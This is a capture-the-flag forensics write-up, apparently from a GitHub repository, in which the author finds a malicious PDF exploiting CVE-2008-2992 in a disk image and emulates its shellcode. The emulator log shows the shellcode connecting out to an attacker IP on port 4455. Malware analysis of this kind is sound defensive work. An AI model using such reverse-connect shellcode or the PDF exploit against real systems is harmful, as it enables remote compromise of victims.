Skip to content

Latest commit

 

History

History
52 lines (35 loc) · 2.5 KB

File metadata and controls

52 lines (35 loc) · 2.5 KB

Policy Violation

We are given an Image. From previous challenges I knew, that files with a .E01 extension are supposed to be opened with Autopsy.

Pt. 1

The first part of the challenge is to find the exploit file and the Number & Date of its CVE.
At first sight I can see that there are 3 files in the recycle bin.

Lets export it and upload it to virustotal. Success! Somebody (probably the challenge author or some kind of bot) has posted a comment with the CVE number to the report

CVE-2008-2992

Now that we know the CVE and that it is relatively safe to handle the file as the exploit is long fixed, we can move on to the next message.

Pt. 2

For this part, we need to find out the Attackers IP. As there is no connection info in the Autopsy report, I eventually realized, that the pdf itself must contain the attacker IP to send something back to him.
I found this file that was used to create the pdf but I was not able to find out how to extract the shellcode out of it at first sight. Then I searched a little more and found this website.
Before using that one, I first wanted to try to do it with https://github.com/PCsXcetra/DerbyCon-2019Files which did not work...

To finally solve the challenge, I installed PDFStreamDumper, highlighted the shellcode inside of the pdf (one of the objects at the left):

And then opened the Javascript UI to analyze the shellcode:

I ran it and got the IP as the output!

Loaded 400 bytes from file sample.sc
Initialization Complete..
Max Steps: 2000000
Using base offset: 0x401000

401348  LoadLibraryA(ws2_32)
401358  WSAStartup(190)
401375  WSASocket(af=2, tp=1, proto=0, group=0, flags=0)
401381  connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07
401381  connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07
401381  connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07
401381  connect(h=42, host: 192.168.1.30 , port: 4455 ) = 71ab4a07

Stepcount 2000001

Solved!